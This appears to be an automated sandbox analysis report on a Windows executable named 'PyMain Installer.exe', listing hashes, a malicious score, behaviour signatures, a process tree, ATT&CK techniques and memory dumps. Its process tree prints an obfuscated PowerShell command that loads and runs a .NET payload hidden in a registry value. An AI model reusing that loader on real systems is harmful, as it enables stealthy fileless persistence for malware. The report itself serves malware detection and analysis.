Analysis

  • max time kernel
    153s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    01-07-2024 18:28

General

  • Target

    zvgfd-main/PyMain Installer.exe

  • Size

    163KB

  • MD5

    1a7d1b5d24ba30c4d3d5502295ab5e89

  • SHA1

    2d5e69cf335605ba0a61f0bbecbea6fc06a42563

  • SHA256

    b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

  • SHA512

    859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

  • SSDEEP

    3072:TQpsSyjlzA664oL8tIoDJxGtIVORPrdAHjl3+uwF+iBDZ/wXxnTFKe8kaz:TQpsSyjlzfnoNGxGo6PrdAHwtMxn4e8N

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:420
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{fa8c5419-55c2-4079-b926-d97bfa942216}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2604
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:464
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:596
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k RPCSS
            2⤵
              PID:676
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
              2⤵
              • Modifies security service
              PID:760
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
              2⤵
                PID:808
                • C:\Windows\system32\Dwm.exe
                  "C:\Windows\system32\Dwm.exe"
                  3⤵
                    PID:1236
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs
                  2⤵
                    PID:844
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {DE8A4E36-F7A4-4F0D-8834-35DC37671F4E} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2740
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+'R'+''+'E'+'').GetValue(''+'$'+''+'7'+''+'7'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        4⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2116
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:992
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:292
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:284
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                          2⤵
                            PID:1040
                          • C:\Windows\system32\taskhost.exe
                            "taskhost.exe"
                            2⤵
                              PID:1128
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                              2⤵
                                PID:2308
                              • C:\Windows\system32\sppsvc.exe
                                C:\Windows\system32\sppsvc.exe
                                2⤵
                                  PID:1356
                              • C:\Windows\system32\lsass.exe
                                C:\Windows\system32\lsass.exe
                                1⤵
                                  PID:480
                                • C:\Windows\system32\lsm.exe
                                  C:\Windows\system32\lsm.exe
                                  1⤵
                                    PID:488
                                  • C:\Windows\Explorer.EXE
                                    C:\Windows\Explorer.EXE
                                    1⤵
                                      PID:1284
                                      • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\PyMain Installer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\PyMain Installer.exe"
                                        2⤵
                                          PID:928
                                      • C:\Windows\system32\conhost.exe
                                        \??\C:\Windows\system32\conhost.exe "-1948577710-928674181-339024835713447962-1275170569-509978129-1210196314-792834035"
                                        1⤵
                                          PID:1880

                                        Network

                                        MITRE ATT&CK Matrix ATT&CK v13

                                        Persistence

                                        Create or Modify System Process

                                        1
                                        T1543

                                        Windows Service

                                        1
                                        T1543.003

                                        Privilege Escalation

                                        Create or Modify System Process

                                        1
                                        T1543

                                        Windows Service

                                        1
                                        T1543.003

                                        Defense Evasion

                                        Modify Registry

                                        1
                                        T1112

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • memory/420-24-0x0000000000370000-0x0000000000395000-memory.dmp
                                          Filesize

                                          148KB

                                        • memory/420-34-0x00000000003A0000-0x00000000003CB000-memory.dmp
                                          Filesize

                                          172KB

                                        • memory/420-42-0x00000000003A0000-0x00000000003CB000-memory.dmp
                                          Filesize

                                          172KB

                                        • memory/420-26-0x00000000003A0000-0x00000000003CB000-memory.dmp
                                          Filesize

                                          172KB

                                        • memory/420-52-0x000007FEBEC30000-0x000007FEBEC40000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/420-53-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/420-25-0x0000000000370000-0x0000000000395000-memory.dmp
                                          Filesize

                                          148KB

                                        • memory/420-83-0x0000000076FD1000-0x0000000076FD2000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/464-71-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/464-54-0x0000000000150000-0x000000000017B000-memory.dmp
                                          Filesize

                                          172KB

                                        • memory/464-68-0x0000000000150000-0x000000000017B000-memory.dmp
                                          Filesize

                                          172KB

                                        • memory/464-70-0x000007FEBEC30000-0x000007FEBEC40000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/480-51-0x0000000000360000-0x000000000038B000-memory.dmp
                                          Filesize

                                          172KB

                                        • memory/480-59-0x000007FEBEC30000-0x000007FEBEC40000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/480-61-0x0000000036FC0000-0x0000000036FD0000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/480-82-0x0000000000120000-0x0000000000145000-memory.dmp
                                          Filesize

                                          148KB

                                        • memory/480-43-0x0000000000360000-0x000000000038B000-memory.dmp
                                          Filesize

                                          172KB

                                        • memory/480-148-0x0000000000120000-0x0000000000145000-memory.dmp
                                          Filesize

                                          148KB

                                        • memory/2116-11-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
                                          Filesize

                                          9.6MB

                                        • memory/2116-2-0x0000000000A40000-0x0000000000A48000-memory.dmp
                                          Filesize

                                          32KB

                                        • memory/2116-3-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
                                          Filesize

                                          9.6MB

                                        • memory/2116-147-0x000007FEF58CE000-0x000007FEF58CF000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2116-0-0x000007FEF58CE000-0x000007FEF58CF000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/2116-30-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
                                          Filesize

                                          9.6MB

                                        • memory/2116-146-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
                                          Filesize

                                          9.6MB

                                        • memory/2116-6-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
                                          Filesize

                                          9.6MB

                                        • memory/2116-1-0x0000000019CA0000-0x0000000019F82000-memory.dmp
                                          Filesize

                                          2.9MB

                                        • memory/2116-4-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
                                          Filesize

                                          9.6MB

                                        • memory/2116-5-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
                                          Filesize

                                          9.6MB

                                        • memory/2116-10-0x0000000076D60000-0x0000000076E7F000-memory.dmp
                                          Filesize

                                          1.1MB

                                        • memory/2116-9-0x0000000076F80000-0x0000000077129000-memory.dmp
                                          Filesize

                                          1.7MB

                                        • memory/2116-8-0x0000000000FA0000-0x0000000000FCA000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/2116-7-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
                                          Filesize

                                          9.6MB

                                        • memory/2604-19-0x0000000076F80000-0x0000000077129000-memory.dmp
                                          Filesize

                                          1.7MB

                                        • memory/2604-16-0x0000000140000000-0x0000000140008000-memory.dmp
                                          Filesize

                                          32KB

                                        • memory/2604-20-0x0000000076D60000-0x0000000076E7F000-memory.dmp
                                          Filesize

                                          1.1MB

                                        • memory/2604-21-0x0000000140000000-0x0000000140008000-memory.dmp
                                          Filesize

                                          32KB

                                        • memory/2604-93-0x0000000076F80000-0x0000000077129000-memory.dmp
                                          Filesize

                                          1.7MB

                                        • memory/2604-92-0x0000000076F81000-0x0000000077082000-memory.dmp
                                          Filesize

                                          1.0MB

                                        • memory/2604-14-0x0000000140000000-0x0000000140008000-memory.dmp
                                          Filesize

                                          32KB

                                        • memory/2604-18-0x0000000140000000-0x0000000140008000-memory.dmp
                                          Filesize

                                          32KB

                                        • memory/2604-12-0x0000000140000000-0x0000000140008000-memory.dmp
                                          Filesize

                                          32KB

                                        • memory/2604-13-0x0000000140000000-0x0000000140008000-memory.dmp
                                          Filesize

                                          32KB

                                        • memory/2604-149-0x0000000076F80000-0x0000000077129000-memory.dmp
                                          Filesize

                                          1.7MB